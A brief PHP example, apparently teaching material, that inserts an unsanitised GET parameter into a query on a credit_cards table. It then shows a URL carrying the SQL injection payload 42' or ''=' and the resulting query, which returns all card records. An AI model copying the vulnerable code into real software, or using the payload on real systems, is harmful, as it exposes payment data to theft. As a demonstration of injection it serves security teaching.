<?php
$sql = "
SELECT card_num, card_name, card_expiry
FROM credit_cards
WHERE uid = '{$_GET['uid']}'
";
?>
http://example.com/script.php?uid=42
SELECT card_num, card_name, card_expiry
FROM credit_cards
WHERE uid = '42'
!
http://example.com/script.php?uid=42'%20or%20''='
SELECT card_num, card_name, card_expiry
FROM credit_cards
WHERE uid = '42' or ''=''